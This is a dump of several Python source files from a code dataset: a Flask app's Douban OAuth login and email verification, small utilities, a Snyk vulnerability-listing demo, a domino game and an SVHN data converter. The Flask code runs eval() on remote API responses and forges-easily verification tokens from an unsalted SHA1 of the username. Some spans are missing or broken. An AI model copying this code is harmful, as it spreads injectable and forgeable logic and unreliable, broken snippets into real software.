+{"seq_id":"379236889","text":"# -*- coding:utf-8 -*-\nimport json\nimport os\nimport importlib\nfrom collections import OrderedDict\n\n__author__ = 'chengchao'\n\n# 此处为获取当前项目所处的根目录,\n# 默认为工程根目录\n# 非线程安全\nroot_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef read_str_file(path):\n \"\"\"\n 根据path读取文件内容,并返回string\n :param path: 相对于根项目的路径\n :return: 文件中的所有内容\n \"\"\"\n if is_empty_str(path):\n raise ValueError(\"路径为空\")\n abspath = get_abs_path(path)\n stream = open(abspath)\n result = \"\"\n for line in stream:\n result += line\n stream.close()\n return result\n\n\ndef load_json_from_file(path):\n jsons = read_str_file(path)\n return json.loads(jsons, object_pairs_hook=OrderedDict)\n\n\ndef get_abs_path(path):\n # todo 此处需要优化,下面代码可能存在bug\n return root_path + os.sep + path\n\n\ndef is_empty_str(str):\n return str is None or str == ''\n\n\ndef is_simple_type(obj):\n return isinstance(obj, (int, float, long, basestring, bool))\n\n\ndef is_empty_arr(arr):\n return arr is None or len(arr) == 0\n\n\ndef to_list(obj):\n lists = obj if isinstance(obj, list) else [obj]\n results = []\n for item in lists:\n results.extend(listfile_by_wildcard(item))\n return results\n\n\ndef listfile_by_wildcard(path):\n if is_empty_str(path):\n return []\n index = path.rfind('*')\n if index == -1:\n return [path]\n return listfiles(path[:index])\n\n\ndef listfiles(path):\n if is_empty_str(path):\n return []\n abs_path = get_abs_path(path)\n if not os.path.isdir(abs_path):\n return []\n lists = os.listdir(abs_path)\n result = []\n for one in lists:\n if os.path.isfile(abs_path + \"/\" + one):\n result.append(path + one)\n return result\n\n\ndef del_if_exist_and_return(key, _dict, default=None):\n value = default if key not in _dict else _dict[key]\n if key in _dict:\n del _dict[key]\n return value\n\n\ndef get_from_arr_by_index(arr, index, default=None):\n if index < 0 or index >= len(arr):\n return default\n return arr[index]\n\n\ndef construct_service(service_name, service_args):\n pos = service_name.rfind('.')\n if pos == -1:\n raise ValueError(\"错误的class配置:%s,格式为:module_name.class_name\" % service_name)\n module_name = service_name[:pos]\n class_name = service_name[pos + 1:]\n module_meta = importlib.import_module(module_name)\n class_meta = getattr(module_meta, class_name)\n return class_meta(service_args)\n","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"652766831","text":"#-*- coding: UTF-8 -*-\n\nfrom __future__ import division\n\nimport urllib, urllib2\n\nimport smtplib\nfrom email.mime.text import MIMEText\n\nimport hashlib\n\nimport math\n\nfrom flask import render_template, request, redirect, url_for, json, session\n\nfrom xichuangzhu import app\n\nimport config\n\nfrom xichuangzhu.models.user_model import User\nfrom xichuangzhu.models.love_work_model import Love_work\nfrom xichuangzhu.models.review_model import Review\nfrom xichuangzhu.models.inform_model import Inform\nfrom xichuangzhu.models.topic_model import Topic\n\nfrom xichuangzhu.utils import content_clean, time_diff, check_login\n\nfrom xichuangzhu.form import EmailForm\n\n# proc - login by douban's oauth2.0 (public)\n#--------------------------------------------------\n\n@app.route('/login/douban')\ndef auth():\n\tcode = request.args['code']\n\n\t# get access token and userID\n\turl = \"https://www.douban.com/service/auth2/token\"\n\tdata = {\n\t\t'client_id': config.DOUBAN_CLIENT_ID,\n\t\t'client_secret': config.DOUBAN_SECRET,\n\t\t'redirect_uri': config.DOUBAN_REDIRECT_URI,\n\t\t'grant_type': 'authorization_code',\n\t\t'code': code\n\t}\n\tdata = urllib.urlencode(data)\n\treq = urllib2.Request(url, data)\n\tresponse = urllib2.urlopen(req)\n\tinfo = eval(response.read())\n\tuser_id = int(info['douban_user_id'])\n\n\t# if user exist\n\tif User.check_exist_by_id(user_id):\n\t\t# if user unactive\n\t\tif not User.check_active(user_id):\n\t\t\treturn redirect(url_for('verify_email_callback', state='unactive', user_id=user_id))\n\t\telse:\n\t\t\t# set session\n\t\t\tsession.permanent = True\n\t\t\tsession['user_id'] = user_id\n\t\t\tsession['user_name'] = User.get_name_by_id(user_id)\n\t\t\tsession['user_abbr'] = User.get_abbr_by_id(user_id)\n\t\t\treturn redirect(url_for('index'))\n\t# if not exist\n\telse:\n\t\t# get user info\n\t\turl = \"https://api.douban.com/v2/user/\" + str(user_id)\n\t\treq = urllib2.Request(url)\n\t\tresponse = urllib2.urlopen(req)\n\t\tuser_info = eval(response.read().replace('\\\\', ''))\t# remove '\\' and convert str to dict\n\n\t\t# add user\n\t\tuser_id = int(user_info['id'])\n\t\tuser_name = user_info['name']\n\t\tabbr = user_info['uid']\n\t\tavatar = user_info['avatar']\n\t\tsignature = user_info['signature']\n\t\tdesc = user_info['desc']\n\t\tlocation_id = int(user_info['loc_id']) if 'loc_id' in user_info else 0\n\t\tlocation = user_info['loc_name']\n\t\tUser.add_user(user_id, user_name, abbr, avatar, signature, desc, location_id, location)\n\n\t\t# go to the verify email page\n\t\treturn redirect(url_for('send_verify_email', user_id=user_id))\n\n# page - send verify email\n#--------------------------------------------------\n\n# view (login)\n@app.route('/send_verify_email/douban', methods=['GET', 'POST'])\ndef send_verify_email():\n\tif request.method == 'GET':\n\t\tuser_id = int(request.args['user_id'])\n\t\tform = EmailForm(user_id=user_id)\n\t\tuser_name = User.get_name_by_id(user_id)\n\t\treturn render_template('send_verify_email.html', user_name=user_name, form=form)\n\telif request.method == 'POST':\n\t\tform = EmailForm(request.form)\n\n\t\tif form.validate():\n\n\t\t\t# email\n\t\t\tt_addr = form.email.data\n\n\t\t\t# user info\n\t\t\tuser_id = int(form.user_id.data)\n\t\t\tuser_name = User.get_name_by_id(user_id)\n\n\t\t\t# add this email to user\n\t\t\tUser.add_email(user_id, t_addr)\n\n\t\t\t# gene verify url\n\t\t\tverify_code = hashlib.sha1(user_name).hexdigest()\n\t\t\tverify_url = config.SITE_DOMAIN + 
\"verify_email/douban/\" + str(user_id) + \"/\" + verify_code\n\n\t\t\t# prepare email content\n\t\t\tmsgText = '''\n\t\t\t\t点击下面的链接,激活你在西窗烛的帐号:
\n\t\t\t\t%s\n\t\t\t\t''' % (verify_url, verify_url)\n\t\t\tmsg = MIMEText(msgText, 'html', 'utf-8')\n\t\t\tmsg['From'] = \"西窗烛 <\" + config.SMTP_FROM + \">\"\n\t\t\tmsg['To'] = user_name + \"<\" + t_addr + \">\"\n\t\t\tmsg['Subject'] = \"欢迎来到西窗烛!\"\n\n\t\t\t# send email\n\t\t\ts = smtplib.SMTP(config.SMTP_SERVER, config.SMTP_PORT)\n\t\t\ts.login(config.SMTP_USER, config.SMTP_PASSWORD)\n\t\t\ts.sendmail(config.SMTP_FROM, t_addr, msg.as_string())\n\n\t\t\treturn redirect(url_for('verify_email_callback', state='send_succ'))\n\t\telse:\n\t\t\tuser_id = int(form.user_id.data)\n\t\t\tuser_name = User.get_name_by_id(user_id)\n\t\t\treturn render_template('send_verify_email.html', user_name=user_name, form=form)\n\n# proc - verify the code and active user (public)\n#--------------------------------------------------\n\n@app.route('/verify_email/douban//')\ndef verify_email(user_id, verify_code):\n\tuser_name = User.get_name_by_id(user_id)\n\tuser_abbr = User.get_abbr_by_id(user_id)\n\tif verify_code == hashlib.sha1(user_name).hexdigest():\n\t\tUser.active_user(user_id)\n\t\tsession.permanent = True\n\t\tsession['user_id'] = user_id\n\t\tsession['user_name'] = user_name\n\t\tsession['user_abbr'] = user_abbr\n\t\treturn redirect(url_for('verify_email_callback', state='active_succ'))\n\telse:\n\t\treturn redirect(url_for('verify_email_callback', state='active_failed'))\n\n# page - show the state of verify\n#--------------------------------------------------\n\n# view (public)\n@app.route('/verify_email_callback/douban/')\ndef verify_email_callback():\n\tstate = request.args['state']\n\tuser_id = int(request.args['user_id']) if 'user_id' in request.args else 0\n\treturn render_template('verify_email_callback.html', state=state, user_id=user_id)\n\n# proc - logout (login)\n#--------------------------------------------------\n@app.route('/logout')\ndef logout():\n\tcheck_login()\n\t\n\tsession.pop('user_id', None)\n\tsession.pop('user_name', None)\n\tsession.pop('user_abbr', None)\n\treturn redirect(url_for('index'))\n\n# page - personal page\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people/')\ndef people(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\tworks = Love_work.get_works_by_user(people['UserID'], 1, 3)\n\tfor work in works:\n\t\twork['Content'] = content_clean(work['Content'])\n\tworks_num = Love_work.get_works_num_by_user(people['UserID'])\n\n\treviews = Review.get_reviews_by_user(people['UserID'], 1, 3)\n\tfor r in reviews:\n\t\tr['Time'] = time_diff(r['Time'])\n\treviews_num = Review.get_reviews_num_by_user(people['UserID'])\n\n\ttopics = Topic.get_topics_by_user(people['UserID'], 1, 3)\n\tfor t in topics:\n\t\tt['Time'] = time_diff(t['Time'])\n\ttopics_num = Topic.get_topics_num_by_user(people['UserID'])\n\n\treturn render_template('people.html', people=people, works=works, works_num=works_num, reviews=reviews, reviews_num=reviews_num, topics=topics, topics_num=topics_num, user_name=user_name)\n\n# page - people love works page\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people//love_works')\ndef people_love_works(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 
1)\n\n\tworks = Love_work.get_works_by_user(people['UserID'], page, num_per_page)\n\tfor work in works:\n\t\twork['Content'] = content_clean(work['Content'])\n\n\tworks_num = Love_work.get_works_num_by_user(people['UserID'])\n\n\t# page paras\n\ttotal_page = int(math.ceil(works_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\treturn render_template('people_love_works.html', people=people, works=works, user_name=user_name, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)\n\n# page - people reviews\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people//reviews')\ndef people_reviews(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\n\treviews = Review.get_reviews_by_user(people['UserID'], page, num_per_page)\n\tfor r in reviews:\n\t\tr['Time'] = time_diff(r['Time'])\n\n\treviews_num = Review.get_reviews_num_by_user(people['UserID'])\n\n\t# page paras\n\ttotal_page = int(math.ceil(reviews_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\treturn render_template('people_reviews.html', people=people, reviews=reviews, user_name=user_name, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)\n\n# page - people topics\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people//topics')\ndef people_topics(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\n\ttopics = Topic.get_topics_by_user(people['UserID'], page, num_per_page)\n\tfor t in topics:\n\t\tt['Time'] = time_diff(t['Time'])\n\n\ttopics_num = Topic.get_topics_num_by_user(people['UserID'])\n\n\t# page paras\n\ttotal_page = int(math.ceil(topics_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\treturn render_template('people_topics.html', people=people, topics=topics, user_name=user_name, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)\n\n# page - informs\n#--------------------------------------------------\n\n# view (login)\n@app.route('/informs')\ndef informs():\n\tcheck_login()\n\t\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\t\n\tinforms = Inform.get_informs(session['user_id'], page, num_per_page)\n\tfor i in informs:\n\t\ti['Time'] = time_diff(i['Time'])\n\n\t# page paras\n\tinforms_num = Inform.get_informs_num(session['user_id'])\n\t#return str(informs_num)\n\ttotal_page = int(math.ceil(informs_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\tnew_informs_num = 
Inform.get_new_informs_num(session['user_id'])\n\n\tInform.update_check_inform_time(session['user_id'])\n\n\treturn render_template('informs.html', informs=informs, new_informs_num=new_informs_num, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)","sub_path":"xichuangzhu/controllers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":10491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"128378445","text":"# coding=utf-8\nimport os\nimport tensorflow as tf\nimport utils as glib_utils\nimport tokenizer as glib_tokenizer\nimport tagger as glib_tagger\nimport parser as glib_parser\nimport time\nimport numpy as np\n\n\nclass Glib(object):\n def __init__(self):\n self.utils = glib_utils.glibUtils()\n self.tmp_dir = self.utils.get_tmp_dir()\n\n def analyze(self, lang, query):\n utils = self.utils\n tmp_dir = self.tmp_dir\n\n token_context = utils.get_tokenizer_context(lang)\n token_model_dir = utils.get_tokenizer_model_dir(lang)\n\n id = utils.generate_id()\n context = utils.copy_context_file(token_context, tmp_dir, id)\n context = utils.update_context(context, token_model_dir, tmp_dir, id)\n utils.write_raw(tmp_dir, id, query)\n\n tokenizer = glib_tokenizer.Tokenizer()\n tokenizer_results = tokenizer.get(context, token_model_dir, tmp_dir, id)\n if tokenizer_results is not None:\n tagger = glib_tagger.Tagger()\n if lang != 'en':\n model_dir = token_model_dir\n else:\n context = utils.get_context(lang)\n model_dir = utils.get_model_dir(lang)\n context = utils.copy_context_file(context, tmp_dir, id)\n context = utils.update_context(context, model_dir, tmp_dir, id)\n\n tagger_results = tagger.get(context, model_dir, tmp_dir, id)\n if tagger_results:\n parser = glib_parser.Parser()\n parser_results = parser.get(context, model_dir, tmp_dir, id)\n if parser_results:\n result = utils.build_response(query, tokenizer_results, tagger_results, parser_results)\n utils.remove_files(tmp_dir, id)\n return result\n else:\n utils.remove_files(tmp_dir, id)\n return None\n else:\n utils.remove_files(tmp_dir, id)\n return None\n else:\n utils.remove_files(tmp_dir, id)\n return None\n\n\n","sub_path":"syntaxnet/glib/glib.py","file_name":"glib.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"306231025","text":"class ShoppingCart:\n # write your code here\n def __init__(self, emp_discount=None):\n self.total = 0\n self.employee_discount = emp_discount\n self.items = []\n\n def add_item(self, name, price, quantity=1):\n for q in range(0,quantity):\n self.items.append({'item_name': name, 'unit_price': price})\n self.total += price\n \n return self.total\n\n def mean_item_price(self):\n return self.total/len(self.items)\n\n def median_item_price(self):\n prices = [item['unit_price'] for item in self.items]\n l = len(prices)\n if l%2 != 0:\n return prices[l//2]\n else: \n return sum(prices[l/2-1:l/2+1])/2\n\n def apply_discount(self):\n if self.employee_discount is not None:\n return round(self.total*(1-self.employee_discount/100), 2)\n else:\n return \"Sorry, there is no discount to apply to your cart :(\"\n\n def void_last_item(self):\n if self.items is []:\n return \"There are no items in your cart!\"\n else:\n self.total -= self.items[-1]['unit_price']\n self.items.pop()","sub_path":"shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"429287189","text":"import argparse\n\nimport xlsxwriter\n\nfrom snyk import SnykClient\nfrom utils import get_default_token_path, get_token\n\n\ndef parse_command_line_args():\n parser = argparse.ArgumentParser(description=\"Snyk API Examples\")\n parser.add_argument(\n \"--orgId\", type=str, help=\"The Snyk Organisation Id\", required=True\n )\n parser.add_argument(\n \"--projectId\", type=str, help=\"The project ID in Snyk\", required=True\n )\n parser.add_argument(\n \"--outputPathExcel\",\n type=str,\n help=\"Optional. The desired output if you want Excel output (use .xlsx).\",\n )\n return parser.parse_args()\n\n\nsnyk_token_path = get_default_token_path()\nsnyk_token = get_token(snyk_token_path)\nargs = parse_command_line_args()\norg_id = args.orgId\nproject_id = args.projectId\n\n\ndef output_excel(vulns, output_path):\n excel_workbook = xlsxwriter.Workbook(output_path)\n excel_worksheet = excel_workbook.add_worksheet()\n format_bold = excel_workbook.add_format({\"bold\": True})\n\n row_index = 0\n\n col_index = 0\n lst_col_headers = list(vulns[0].keys())\n\n for ch in lst_col_headers:\n excel_worksheet.write(\n row_index, col_index, lst_col_headers[col_index], format_bold\n )\n col_index += 1\n\n for v in vulns:\n row_index += 1\n\n col_index = 0\n for k in lst_col_headers:\n excel_worksheet.write(row_index, col_index, v[k])\n col_index += 1\n\n excel_workbook.close()\n\n\nclient = SnykClient(snyk_token)\nissue_set = client.organizations.get(org_id).projects.get(project_id).issueset.all()\n\nlst_output = []\nfor v in issue_set.issues.vulnerabilities:\n print(\"\\n %s\" % v.title)\n print(\" id: %s\" % v.id)\n print(\" url: %s\" % v.url)\n\n print(\" %s@%s\" % (v.package, v.version))\n print(\" Severity: %s\" % v.severity)\n print(\" CVSS Score: %s\" % v.cvssScore)\n\n # for the excel output\n new_output_item = {\n \"title\": v.title,\n \"id\": v.id,\n \"url\": v.url,\n \"package\": \"%s@%s\" % (v.package, v.version),\n \"severity\": v.severity,\n \"cvssScore\": v.cvssScore,\n }\n lst_output.append(new_output_item)\n\nif args.outputPathExcel:\n output_excel(lst_output, args.outputPathExcel)\n","sub_path":"examples/api-demo-2-list-issues.py","file_name":"api-demo-2-list-issues.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"632940440","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 7 09:52:27 2019\n\n@author: picardge\n\"\"\"\nimport unittest\nimport random\nclass Domino():\n def __init__(self,c1,c2,etat='pioche'):\n self.c1=c1\n self.c2=c2\n self.etat= etat\n \n def __str__(self):\n return '['+str(self.c1)+' | '+str(self.c2)+']'\n \n def permute(self):\n self.c1, self.c2 = self.c2, self.c1\n return self\n\n \n\n \nclass Joueur():\n def __init__(self,numero,contenu):\n self.numero=numero\n self.contenu=contenu\n \n def __str__(self):\n s = str(self.numero) + ': '\n for domino in self.contenu:\n s += str(domino) + ' '\n return(s)\n \n def monDoubleLePlusFort(self):\n m=0\n for domino in self.contenu:\n if domino.c1==domino.c2:\n if mself.j2.monDoubleLePlusFort():\n print(cr.j1)\n print(\"C'est au joueur 1 de commencer: \")\n x=input()\n x = int(x)\n self.plateau.contenu.append(self.j1.contenu[x])\n self.j1.contenu[x].etat='plateau'\n self.j1.contenu.pop(x)\n \n return 1\n \n if self.j2.monDoubleLePlusFort()>self.j1.monDoubleLePlusFort():\n print(cr.j2)\n print(\"C'est au joueur 2 de commencer: \")\n x=input()\n x = int(x)\n self.plateau.contenu.append(self.j2.contenu[x])\n self.j2.contenu[x].etat='plateau'\n self.j2.contenu.pop(x)\n return 2\n def j1Joue(self):\n print(self.plateau)\n print(self.j1)\n x = input()\n x = list(x)\n if len(x) == 3:\n self.ajouteDomino(self.j1.contenu[int(x[0])].permute(),x[1])\n else:\n self.ajouteDomino(self.j1.contenu[int(x[0])],x[1])\n def j2Joue(self):\n print(self.plateau)\n print(self.j2)\n x = input()\n x = list(x)\n if len(x) == 3:\n self.ajouteDomino(self.j2.contenu[int(x[0])].permute(),x[1])\n \n else:\n self.ajouteDomino(self.j2.contenu[int(x[0])],x[1])\n \n \n def simulation(self,a=-1,p=True):\n if self.t==True:\n a = cr.premierTour()\n print(\"a: 0\",a)\n self.t=False\n \n \n if len(self.pioche.contenu)==0 and self.peutJouer(self.j1)==False and self.peutJouer(self.j2)==False:\n print('la partie est terminée')\n \n if a==2:\n if self.peutJouer(1)== True:\n self.j1Joue()\n if self.peutJouer(2)== True:\n self.j2Joue()\n else:\n print(\"j2 a pioché \")\n self.piocher(self.j2)\n a = 1 \n else:\n print(\"YESSSSSSSSSSSSSSSSSSS\")\n print(\"j1 a pioché \")\n self.piocher(self.j1)\n a = 2\n if a==1:\n if self.peutJouer(2)== True:\n self.j2Joue()\n if self.peutJouer(1)== True:\n self.j1Joue()\n else:\n print(\"OUUIIIIIIIIIIII\")\n print(\"j1 a pioché \")\n self.piocher(self.j1)\n a = 2\n else:\n print(\"j2 a pioché \")\n self.piocher(self.j2)\n a = 1\n \n \n \n return (self.simulation(a,p)) \n \n \nclass TestDomino(unittest.TestCase):\n def testDouble(self):\n j1=Joueur(1,[Domino(6,6),Domino(5,4),Domino(5,5),Domino(1,2)])\n self.assertEqual(j1.monDoubleLePlusFort(),6)\n j2=Joueur(1,[Domino(4,6),Domino(5,4),Domino(5,5),Domino(1,2)])\n self.assertEqual(j2.monDoubleLePlusFort(),5)\n \n \n def testAjoute(self):\n cr=Croupier()\n cr.distribution()\n cr.plateau.contenu.append(Domino(cr.j1.contenu[0].c2,6))\n cr.ajouteDomino(cr.j1.contenu[0],'g')\n self.assertEqual(len(cr.plateau.contenu),2)\n self.assertEqual(len(cr.j1.contenu),6)\n \n cr.plateau.contenu=[]\n cr.plateau.contenu.append(Domino(6,cr.j1.contenu[0].c1))\n cr.ajouteDomino(cr.j1.contenu[0],'d')\n self.assertEqual(len(cr.plateau.contenu),2)\n self.assertEqual(len(cr.j1.contenu),5)\n \n \n def testPeutJouer(self):\n cr=Croupier()\n cr.plateau.contenu.append(Domino(0,0))\n cr.j1.contenu=cr.j1.contenu + [Domino(2,1),Domino(6,5),Domino(1,3),Domino(5,2)]\n 
self.assertEqual(cr.peutJouer(1),False)\n cr.j1.contenu=cr.j1.contenu + [Domino(0,1),Domino(6,5),Domino(1,3),Domino(5,2)]\n self.assertEqual(cr.peutJouer(1),True)\n print(cr.plateau)\n \n \n def testPiocher(self):\n cr=Croupier()\n cr.distribution()\n cr.piocher(cr.j1)\n self.assertEqual(len(cr.j1.contenu),8)\n self.assertEqual(len(cr.pioche.contenu),13)\n cr.piocher(cr.j1)\n self.assertEqual(len(cr.j1.contenu),9)\n self.assertEqual(len(cr.pioche.contenu),12)\n \n \n \n \n \n \n\n\n \n \n \n \n \nif __name__ == \"__main__\":\n \n cr = Croupier()\n cr.distribution()\n cr.simulation()\n \n #unittest.main()\n \n\n\n","sub_path":"domino.py","file_name":"domino.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"578226484","text":"import os\nimport numpy as np\nimport h5py\nimport random\nfrom PIL import Image\nimport tensorflow as tf\nfrom data_meta import DataMeta\n\ntf.app.flags.DEFINE_string('data_dir', './data',\n 'Directory to SVHN (format 1) folders and write the converted files')\nFLAGS = tf.app.flags.FLAGS\n\n\nclass SampleReader(object):\n def __init__(self, path_to_image_files):\n self._path_to_image_files = path_to_image_files\n self._num_examples = len(self._path_to_image_files)\n self._sample_pointer = 0\n\n @staticmethod\n def get_attrs(digit_struct_mat_file, index):\n\n \"\"\"\n Returns a dictionary which contains keys: label, left, top, width and height, each key has multiple values.\n \"\"\"\n attrs = {}\n f = digit_struct_mat_file\n item = f['digitStruct']['bbox'][index].item()\n for key in ['label', 'left', 'top', 'width', 'height']:\n attr = f[item][key]\n values = [f[attr.value[i].item()].value[0][0]\n for i in range(len(attr))] if len(attr) > 1 else [attr.value[0][0]]\n attrs[key] = values\n return attrs\n\n @staticmethod\n def do_preprocess(image, bbox_left, bbox_top, bbox_width, bbox_height):\n\n \"\"\"\n Returns the preprocessed image by cropping and resizing\n \"\"\"\n cropped_left, cropped_top, cropped_width, cropped_height = (int(round(bbox_left - 0.15 * bbox_width)),\n int(round(bbox_top - 0.15 * bbox_height)),\n int(round(bbox_width * 1.3)),\n int(round(bbox_height * 1.3)))\n image = image.crop([cropped_left, cropped_top, cropped_left + cropped_width, cropped_top + cropped_height])\n image = image.resize([64, 64])\n return image\n\n @staticmethod\n def int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n @staticmethod\n def float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n @staticmethod\n def bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n def read_and_convert(self, digit_struct_mat_file):\n\n \"\"\"\n Read and convert to sample, returns None if no data is available.\n \"\"\"\n if self._sample_pointer == self._num_examples:\n return None\n path_to_image_file = self._path_to_image_files[self._sample_pointer]\n index = int(path_to_image_file.split('/')[-1].split('.')[0]) - 1\n self._sample_pointer += 1\n\n # get sample attributes\n\n attrs = SampleReader.get_attrs(digit_struct_mat_file, index)\n label_of_digits = attrs['label']\n length = len(label_of_digits)\n\n # if length is greater than 5 skip this example\n\n if length > 5:\n return self.read_and_convert(digit_struct_mat_file)\n\n digits = [10, 10, 10, 10, 10] # digit 10 represents no digit\n for idx, label_of_digit in enumerate(label_of_digits):\n digits[idx] = int(label_of_digit if label_of_digit != 10 else 0) # label 10 is essentially digit zero\n\n # gets the bounding boxes of the digits to crop the image\n\n attrs_left, attrs_top, attrs_width, attrs_height = map(lambda x: [int(i) for i in x], \n [attrs['left'], attrs['top'], attrs['width'], attrs['height']])\n min_left, min_top, max_right, max_bottom = (min(attrs_left),\n min(attrs_top),\n max(map(lambda x, y: x + y, attrs_left, attrs_width)),\n max(map(lambda x, y: x + y, attrs_top, attrs_height)))\n center_x, center_y, max_side = ((min_left + max_right) / 2.0,\n (min_top + max_bottom) / 2.0,\n max(max_right - min_left, max_bottom - min_top))\n bbox_left, bbox_top, bbox_width, bbox_height = (center_x - max_side / 2.0,\n center_y - max_side / 2.0,\n max_side,\n max_side)\n image = 
np.array(SampleReader.do_preprocess(Image.open(path_to_image_file), bbox_left, bbox_top, bbox_width, bbox_height)).tobytes()\n\n sample = tf.train.sample(features=tf.train.Features(feature={\n 'image': SampleReader.bytes_feature(image),\n 'length': SampleReader.int64_feature(length),\n 'digits': tf.train.Feature(int64_list=tf.train.Int64List(value=digits))\n }))\n return sample\n\n\ndef create_tfrecords_meta_file(num_train_examples, num_val_examples, num_test_examples,\n tfrecords_meta_file):\n\n \"\"\"\n Saves the meta file to the tfrecords meta file\n \"\"\"\n\n meta = DataMeta()\n meta.num_train_examples = num_train_examples\n meta.num_val_examples = num_val_examples\n meta.num_test_examples = num_test_examples\n meta.save(tfrecords_meta_file)\n\n\ndef convert_to_tfrecords(path_to_dataset_dir_and_digit_struct_mat_file_tuples,\n path_to_tfrecords_files, choose_writer_callback):\n\n \"\"\"\n input: path_to_dataset_dir_and_digit_struct_mat_file_tuples => (datset dir,digit_struct_mat_file)\n path_to_tfrecords_files => tfrecords file path\n\n funct: converts the image and writes them in tfrecords file\n\n output: returns the number of examples converted\n\n \"\"\"\n num_examples = []\n writers = []\n\n for path_to_tfrecords_file in path_to_tfrecords_files:\n num_examples.append(0)\n writers.append(tf.python_io.TFRecordWriter(path_to_tfrecords_file))\n\n for path_to_dataset_dir, path_to_digit_struct_mat_file in path_to_dataset_dir_and_digit_struct_mat_file_tuples:\n path_to_image_files = tf.gfile.Glob(os.path.join(path_to_dataset_dir, '*.png'))\n total_files = len(path_to_image_files)\n\n\n with h5py.File(path_to_digit_struct_mat_file, 'r') as digit_struct_mat_file:\n sample_reader = SampleReader(path_to_image_files)\n for index, path_to_image_file in enumerate(path_to_image_files):\n\n sample = sample_reader.read_and_convert(digit_struct_mat_file)\n if sample is None:\n break\n\n idx = choose_writer_callback(path_to_tfrecords_files)\n writers[idx].write(sample.SerializeToString())\n num_examples[idx] += 1\n\n for writer in writers:\n writer.close()\n\n return num_examples\n\n\n\n\ndef main(_):\n\n \"\"\"\n Process the train, validation , and test data and create the tfrecords file for each set\n \"\"\"\n\n # Getting the data and their meta files path\n train_dir = os.path.join(FLAGS.data_dir, 'train')\n test_dir = os.path.join(FLAGS.data_dir, 'test')\n extra_dir = os.path.join(FLAGS.data_dir, 'extra')\n train_digit_struct_mat_file = os.path.join(train_dir, 'digitStruct.mat')\n test_digit_struct_mat_file = os.path.join(test_dir, 'digitStruct.mat')\n extra_digit_struct_mat_file = os.path.join(extra_dir, 'digitStruct.mat')\n\n train_tfrecords_file = os.path.join(FLAGS.data_dir, 'train.tfrecords')\n val_tfrecords_file = os.path.join(FLAGS.data_dir, 'val.tfrecords')\n test_tfrecords_file = os.path.join(FLAGS.data_dir, 'test.tfrecords')\n tfrecords_meta_file = os.path.join(FLAGS.data_dir, 'meta.json')\n\n\n\n for path_to_file in [train_tfrecords_file, val_tfrecords_file, test_tfrecords_file]:\n assert not os.path.exists(path_to_file), 'The file %s already exists' % path_to_file\n\n # Processing the train and Validation data\n\n [num_train_examples, num_val_examples] = convert_to_tfrecords([(train_dir, train_digit_struct_mat_file),\n (extra_dir, extra_digit_struct_mat_file)],\n [train_tfrecords_file, val_tfrecords_file],\n lambda paths: 0 if random.random() > 0.1 else 1)\n \n # Processing test data\n\n [num_test_examples] = convert_to_tfrecords([(test_dir, test_digit_struct_mat_file)],\n 
